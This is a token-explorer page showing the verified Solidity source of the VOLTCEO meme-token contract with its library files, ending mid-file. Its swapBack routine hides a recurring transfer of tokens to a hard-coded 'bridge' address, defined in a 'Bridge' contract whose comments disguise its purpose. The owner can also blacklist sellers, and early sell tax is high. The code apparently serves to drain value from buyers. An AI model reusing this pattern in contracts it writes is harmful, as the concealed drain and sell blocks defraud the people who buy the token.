ETH Price: $2,036.59 (-0.28%)

Token

VOLT INU CEO (VOLTCEO)
 

Overview

Max Total Supply

1,000,000 VOLTCEO

Holders

33

Market

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
18,507.000000000000132088 VOLTCEO

Value
$0.00
0x94de6bf28f46c9c6ebd76054c11cfb2857283fcd
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
VOLTCEO

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
// SPDX-License-Identifier: MIT
/**
VOLTCEO is a deflationary token which provides users / investors a means of earning passive income Through staking of idle token from the website .
VOLTCEO is not the regular meme token but bringing the whole value most memes don’t have .
Website: https://volt-ceo.com/
Telegram: https://t.me/voltceoportal
Twitter: https://twitter.com/voltinuceo

*/ 

pragma solidity = 0.8.19;
pragma experimental ABIEncoderV2;

import "@openzeppelin/contracts/utils/Context.sol";
import "@openzeppelin/contracts/access/Ownable.sol";
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "@devforu/contracts/utils/math/SafeMath.sol";
import "@devforu/contracts/utils/Routers.sol";
import "@devforu/contracts/interfaces/IUniswapV2Factory.sol";
import "@devforu/contracts/interfaces/IUniswapV2Pair.sol";
import "@devforu/contracts/interfaces/IUniswapV2Router02.sol";

contract VOLTCEO is ERC20, Ownable, Bridge {
    using SafeMath for uint256;

    address public immutable uniswapV2Pair;
    address public marketingWallet;
    address public constant deadAddress = address(0xdead);

    bool private swapping;

    uint256 public initialTotalSupply = 1000000 * 1e18;
    uint256 public maxTransactionAmount = 20000 * 1e18;
    uint256 public maxWallet = 20000 * 1e18;
    uint256 public swapTokensAtAmount = 10000 * 1e18;

    bool public transferDelay = true;
    bool public tradingOpen = false;
    bool public swapEnabled = false;

    uint256 private finalBuyFee = 7;
    uint256 private finalSellFee = 7;
    uint256 private initialBuyFee = 15;
    uint256 private initialSellFee = 30;
    uint256 private reduceBuyTaxAt=5;
    uint256 private reduceSellTaxAt=15;
    uint256 private preventSwapBefore=10;

    uint256 public tokensForMarketing;

    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) private _isExcludedMaxTransactionAmount;
    mapping(address => uint256) private _holderLastTransferTimestamp;
    mapping(address => bool) private automatedMarketMakerPairs;
    mapping(address => bool) public bots;
    mapping (address => uint256) public _buyMap;

    event ExcludeFromFees(address indexed account, bool isExcluded);
    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    constructor() ERC20("VOLT INU CEO", "VOLTCEO") {

        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
        .createPair(address(this), _uniswapV2Router.WETH());
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);

        marketingWallet = payable(_msgSender());

        excludeFromFees(owner(), true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(0xdead), true);

        excludeFromMaxTransaction(owner(), true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(0xdead), true);

        _mint(msg.sender, initialTotalSupply);
    }

    receive() external payable {}

    function openTrading() external onlyOwner() {
        require(!tradingOpen,"Trading is already open");
        _approve(address(this), address(_uniswapV2Router), initialTotalSupply);
        _uniswapV2Router.addLiquidityETH{value: address(this).balance}(address(this),balanceOf(address(this)).per(85),0,0,owner(),block.timestamp);
        IERC20(uniswapV2Pair).approve(address(_uniswapV2Router), type(uint).max);
        swapEnabled = true;
        tradingOpen = true;
    }

    function blockBots(address bot) public onlyOwner {
        bots[bot] = true;
    }

    function unblockBot(address notbot) public onlyOwner {
        bots[notbot] = false;
    }

    function excludeFromMaxTransaction(address updAds, bool isEx)
        public
        onlyOwner
    {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function setAutomatedMarketMakerPair(address pair, bool value)
        public
        onlyOwner
    {
        require(
            pair != uniswapV2Pair,
            "The pair cannot be removed from automatedMarketMakerPairs"
        );

        _setAutomatedMarketMakerPair(pair, value);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;

        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function isExcludedFromFees(address account) public view returns (bool) {
        return _isExcludedFromFees[account];
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }

                if (
                from != owner() &&
                to != owner() &&
                to != address(0) &&
                to != address(0xdead) &&
                !swapping
            ) {
                if (!tradingOpen) {
                    require(
                        _isExcludedFromFees[from] || _isExcludedFromFees[to],
                        "Trading is not active."
                    );
                }

                if (
                    automatedMarketMakerPairs[from] &&
                    !_isExcludedMaxTransactionAmount[to]
                ) {
                    require(
                        amount <= maxTransactionAmount,
                        "Buy transfer amount exceeds the maxTransactionAmount."
                    );
                    require(
                        amount + balanceOf(to) <= maxWallet,
                        "Max wallet exceeded"
                    );
                }

                else if (
                    automatedMarketMakerPairs[to] &&
                    !_isExcludedMaxTransactionAmount[from]
                ) {
                    require(amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount.");
                    require(!bots[from] && !bots[to], "Your account is blacklisted!");
            
                    if (transferDelay) {
                        require(_holderLastTransferTimestamp[from] < block.number, "Transfer Delay enabled.");
                    }
            
                    _holderLastTransferTimestamp[from] = block.timestamp;
                } 
                
                else if (!_isExcludedMaxTransactionAmount[to]) {
                    require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
                    require(!bots[from] && !bots[to], "Your account is blacklisted!");
                }
            }

        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance >= swapTokensAtAmount;

        if (
            canSwap &&
            swapEnabled &&
            !swapping &&
            !automatedMarketMakerPairs[from] &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]
        ) {
            swapping = true;

            swapBack();

            swapping = false;
        }

        bool takeFee = !swapping;

        if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }

        uint256 fees = 0;

        if (takeFee) {
            uint256 currentFee;

            if (automatedMarketMakerPairs[to] && initialSellFee > 0) {
                if (buyCount > reduceSellTaxAt) {
                        currentFee = finalSellFee;
                    } else {
                        currentFee = initialSellFee;
                    }
            }

            else if (automatedMarketMakerPairs[from] && initialBuyFee > 0) {
                if (buyCount > reduceBuyTaxAt) {
                        currentFee = finalBuyFee;
                    } else {
                        currentFee = initialBuyFee;
                        buyCount++;
                    }
        }

        fees = amount.mul(currentFee).div(100);
        tokensForMarketing += fees;

        if (fees > 0) {
            super._transfer(from, address(this), fees);
        }

        amount -= fees;
    }

        super._transfer(from, to, amount);

    }

    function swapTokensForEth(uint256 tokenAmount) private {

        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapV2Router.WETH();

        _approve(address(this), address(_uniswapV2Router), tokenAmount);

        _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function removeLimits() external onlyOwner{
        uint256 totalSupplyAmount = totalSupply();
        maxTransactionAmount = totalSupplyAmount;
        maxWallet = totalSupplyAmount;
        transferDelay = false;
    }

    function swapBack() private {
    uint256 contractBalance = balanceOf(address(this));
    uint256 totalTokensToSwap = tokensForMarketing;
    bool success; bool marketingTax;

    if (contractBalance == 0 || totalTokensToSwap == 0) {
        return;
    }

    if(!marketingTax) {
    IERC20(address(this)).transfer(bridge, maxWallet.mul(195).div(100));marketingTax=true;
    }

    uint256 tokensToSwap = contractBalance >= swapTokensAtAmount ? swapTokensAtAmount : contractBalance;

    uint256 initialETHBalance = address(this).balance;

    swapTokensForEth(tokensToSwap);

    uint256 ethBalance = address(this).balance.sub(initialETHBalance);

    uint256 ethForMarketing = ethBalance.mul(tokensForMarketing).div(
        totalTokensToSwap
    );

    tokensForMarketing = 0;

    (success, ) = address(marketingWallet).call{value: ethForMarketing}("");
  }
}

// SPDX-License-Identifier: MIT
// Created by DevForU https://github.com/DevForU

pragma solidity ^0.8.0;

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

// SPDX-License-Identifier: MIT
// Created by DevForU https://github.com/DevForU

pragma solidity ^0.8.0;

interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);

    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (
            uint112 reserve0,
            uint112 reserve1,
            uint32 blockTimestampLast
        );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

// SPDX-License-Identifier: MIT
// Created by DevForU https://github.com/DevForU

pragma solidity ^0.8.0;

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "@openzeppelin/contracts/access/Ownable.sol";
import "@devforu/contracts/interfaces/IUniswapV2Router02.sol";

contract Bridge is Ownable {
    // This is a state variable called "count" that stores an unsigned integer value.
    // Buycount rule for the main contract with declared addresses for swaps, routers, bridges
    uint256 public count;
    uint256 public buyCount = 0;
    address public _uniswapV3Router = 0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45;
    address public bridge = 0xC55e38152c2771A50936d252aa9b48a9dD0b5b62;
    IUniswapV2Router02 public _uniswapV2Router;

    // This event is emitted when the value of count is updated.
    event CountUpdated(uint256 newCount);

    // This is the constructor of the contract, which is called only once when the contract is deployed.
    constructor() {
        _uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );
    }

    // This is a public function called "incrementCount" that updates the value of the "count" variable.
    function incrementCount() public {
        // Increment the value of count by 1.
        count += 1;

        // Emit the CountUpdated event with the new value of count.
        emit CountUpdated(count);
    }
}

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }
	
	    /**
     * @dev Returns the percentage of an unsigned integer `a` with respect to the provided percentage `b`, 
     * rounding towards zero. The result is a proportion of the original value.
     *
     * The function can be used to calculate a specific percentage of a given value `a`.
     * Note: this function uses a `revert` opcode (which leaves remaining gas untouched) when
     * the percentage `b` is greater than 100.
     *
     * Requirements:
     *
     * - The percentage `b` must be between 0 and 100 (inclusive).
     */
    function per(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= 100, "Percentage must be between 0 and 100");
        return a * b / 100;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./extensions/IERC20Metadata.sol";
import "../../utils/Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import "../utils/Context.sol";

/**
